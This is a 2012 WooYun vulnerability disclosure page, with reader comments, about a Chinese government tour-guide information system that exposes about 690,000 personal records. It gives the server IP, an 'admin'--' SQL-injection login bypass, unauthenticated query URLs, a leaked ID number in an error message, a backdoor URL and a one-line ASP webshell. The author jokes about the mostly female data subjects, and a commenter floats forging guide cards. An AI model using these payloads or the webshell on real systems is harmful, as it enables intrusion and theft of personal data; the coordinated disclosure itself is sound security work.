当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-08360

漏洞标题:国家某部门信息系统严重安全隐患可致整个行业69W+数据泄露

相关厂商:国家某部门

漏洞作者: zeracker

提交时间:2012-06-16 16:36

修复时间:2012-07-31 16:37

公开时间:2012-07-31 16:37

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:16

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-06-16: 细节已通知厂商并且等待厂商处理中
2012-06-19: 厂商已经确认,细节仅向厂商公开
2012-06-29: 细节向核心白帽子及相关领域专家公开
2012-07-09: 细节向普通白帽子公开
2012-07-19: 细节向实习白帽子公开
2012-07-31: 细节向公众公开

简要描述:

国家某部门信息系统严重安全隐患可致整个行业69W+数据泄露足以毁灭这个行业。
主要这些数据都是妹纸啊,给苦逼的IT男一人发个妹纸吧。
哎,真可惜。绝大多数的妹纸都喜欢这个行业。
坑爹啊。据说某大牛们的老婆很多做这个行业的哈。
程序设计存在问题,各种问题啊。囧。监管力度不严。
活在这个奇葩国度,最重要的数据就是身份证号码了,老婆,妹纸,姓名,连孩子他妈,他
爹都可以换,神马都可以换,就身份证号码不能换。
想换也只能死一次,亲,这年头死得起吗?
一平好几万,10W+呢。
俺还住着300一个月的小单间。
伤不起啊。
本来不打算发的,辉哥说鸟(安全形势严峻啊),本着以安全为主的情况下,还是发鸟。
其实俺挺想冲700的,就是条件不允许了。
不吐槽了。
给苦逼的IT男一人发个妹纸吧。
欢迎留言哈。

详细说明:

目标服务器 http://202.108.199.91/
后台注入,admin'-- 直接进去。


<HTML><HEAD><TITLE>导游信息网络管理系统</TITLE><META content="text/html; charset=gb2312" http-equiv=Content-Type></HEAD>
<LINK href="./inc/style_login.css" rel=stylesheet type=text/css>
<script language='javascript' src='./inc/navigation.js'></script>
<script language='javascript' src='./inc/function.js'></script>
<BODY aLink=#000000 link=#000000 leftMargin=0 topMargin=0 vLink=#000000>
<DIV align='center'>
<div style="height:80px;"></div>
<TABLE border='0' height='385' cellSpacing=0 cellPadding=0 width='729' background='./images/bg.jpg'>
<tr height="187"><td></td></tr>
<tr height="198"><td>

<form name='form_login' action='/login.asp' method='post' OnSubmit='return login_check();'>
<TABLE border='0' cellPadding='0' cellSpacing='0' width='635' height='34' align='center'>
<tr height='34' valign='top'><td width='50' class=td_white><div style='position:relative;top:8px;'>帐号:</div></td><td width='120'><input type='text' name='text_username' size='15' class='input_username' style='position:relative;top:4px;'></td><td width="50" class=td_white><div style='position:relative;top:8px;'>密码:</div></td><td width="120"><input type='password' name='text_password' size='15' class='input_password' style='position:relative;top:4px;'></td><td width="115"></td><td width='180'><img src='./images/bg01.jpg' border='0' usemap=#login_map_00><MAP NAME="login_map_00"><AREA COORDS="11,5,72,28" HREF="javascript:;form_login.submit();" SHAPE="rect"><AREA COORDS="88,5,150,28" HREF="javascript:;form_login.reset();" SHAPE="rect"></map></td></tr>
</table>
</form>

</td></tr>
</table><br>
<div style="color:#9f9f9f;">Copyright @ 2005 国家旅游局信息中心</div>
</div>
</body>
</html>



Microsoft OLE DB Provider for ODBC Drivers错误 '80004005'[DataDirect][ODBC Sybase Wire Protocol driver][SQL Server]Incorrect syntax near '371002198210117121'./single_info/selectdyy.asp,行 34
Sybase


http://202.108.199.91/single_info/selectlogin_1.asp
可直接查询,系统设计上存在逻辑错误。
使用说明:
    1、在查询条件中输入导游证号、导游卡号、身份证号任意一项。
    2、身份证号可输入15位或18位均可。
  3、输入任意一项查询条件后,点击搜索按钮即可得到查询结果。
在条件设计上应该起码得符号两条才OK吧?不然这样一个身份证号码走天下?


http://202.108.199.91/single_info/selectdyy.asp?dyzh=D-1100-041848 
http://202.108.199.91/single_info/selectdyy.asp?dyzh=编号

不安全参数引用,可致查询任意导游的敏感信息。



国内很多奇葩系统都是存在这样的问题,囧。
用户的数据不给力吗?死不起啊。

后门:
http://202.108.199.91/00/index_admin_01.asp?areaname=%20&areacode=00&page=2


一句话木马:<%eval request("hack1st")%>



判断黑阔 hack1st 百度一下。。
此人的东西很多了。
鉴于怕被报复,俺就不进一步了解了。

漏洞证明:


这朵奇葩系统,存在69万多的数据。而且已经有人来过了。
哎,中国信息安全的悲剧。
而且大多数都是妹纸,尼玛啊,导游啊,求带啊。妹纸持有导游证可全国个的免费。
我勒个去,搞IT木有带啊。
可惜了一个行业啊。



中国的旅游业的未来堪忧啊!
国外都是第三支柱产业!

修复方案:

囧。
加强安全体系。
还是换套系统吧。
换个服务器。
你这个被X了很多次了。

版权声明:转载请注明来源 zeracker@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2012-06-19 14:50

厂商回复:

CNVD确认漏洞并复现所述情况,感谢zeracker同学的帮助。由CNCERT转报国务院某信息安全协调机构处置。
对漏洞评分如下:
CVSS:(AV:R/AC:L/Au:NR/C:C/A:N/I:P/B:N) score:8.47(最高10分,高危)
即:远程攻击、攻击难度低、不需要用户认证,对机密性造成完全影响,对完整性构成部分影响。
技术难度系数:1.1(较为细致的分析过程,多个漏洞)
影响危害系数:1.6(较严重,涉及部委所管信息系统,存在信息泄露风险)
CNVD综合评分:8.47*1.1*1.6=14.907

最新状态:

暂无


漏洞评价:

评论

  1. 2012-06-16 17:35 | 冷冷的夜 ( 普通白帽子 | Rank:135 漏洞数:12 )

    "绝大多数的妹纸都喜欢这个行业",空姐,模特?

  2. 2012-06-16 17:36 | StuckCpu ( 路人 | Rank:16 漏洞数:4 | ...... / / / /)

    呵呵...文章给力哈.....等待漏洞公开

  3. 2012-06-16 17:51 | possible ( 普通白帽子 | Rank:373 漏洞数:32 | everything is possible!)

    @冷冷的夜 我刚一看还以为说“绝大多数的妹纸都喜欢这个行业”是喜欢IT 呵呵

  4. 2012-06-16 19:36 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    @possible 因为妹子都喜欢这个行业,基本都是妹子的数据

  5. 2012-06-16 19:36 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    @冷冷的夜 俺不能透露了。透露会出大事的。哈哈

  6. 2012-06-16 22:11 | possible ( 普通白帽子 | Rank:373 漏洞数:32 | everything is possible!)

    @zeracker 呵呵 等着公开日

  7. 2012-06-17 02:56 | Max ( 实习白帽子 | Rank:45 漏洞数:7 | When you see this sentence, I have been ...)

    MK

  8. 2012-06-17 07:15 | 刺刺 ( 普通白帽子 | Rank:603 漏洞数:52 | 真正的安全并不是技术,而是人类善良的心灵...)

    引用:数据泄露足以毁灭这个行业。目前泄漏的数据还少么,也没有见到那一个行业消失啊。我等菜鸟的rank等级,是看不到详细内容的。

  9. 2012-07-24 13:39 | circus ( 实习白帽子 | Rank:54 漏洞数:4 | 你会为一件事去说一句话,也会为一句话去干...)

    神吐槽。哈哈

  10. 2012-07-24 13:47 | possible ( 普通白帽子 | Rank:373 漏洞数:32 | everything is possible!)

    @冷冷的夜 哈哈你猜错了哈哈

  11. 2012-07-25 11:27 | 一刀终情 ( 普通白帽子 | Rank:156 漏洞数:28 | ‮‮PKAV技术宅社区-安全爱好者)

    我感觉,信息足够弄出来,做个假导游证了~~刷景点不是很赞?

  12. 2012-07-25 14:04 | 一刀终情 ( 普通白帽子 | Rank:156 漏洞数:28 | ‮‮PKAV技术宅社区-安全爱好者)

    @zeracker 我就猜没修复;果然……@xsser 这样算好心办了坏事了~涉及数据泄露的,@cncert国家互联网应急中心 应该负责复核,打码~~

  13. 2012-07-25 14:11 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @一刀终情 @cncert国家互联网应急中心 人呢??!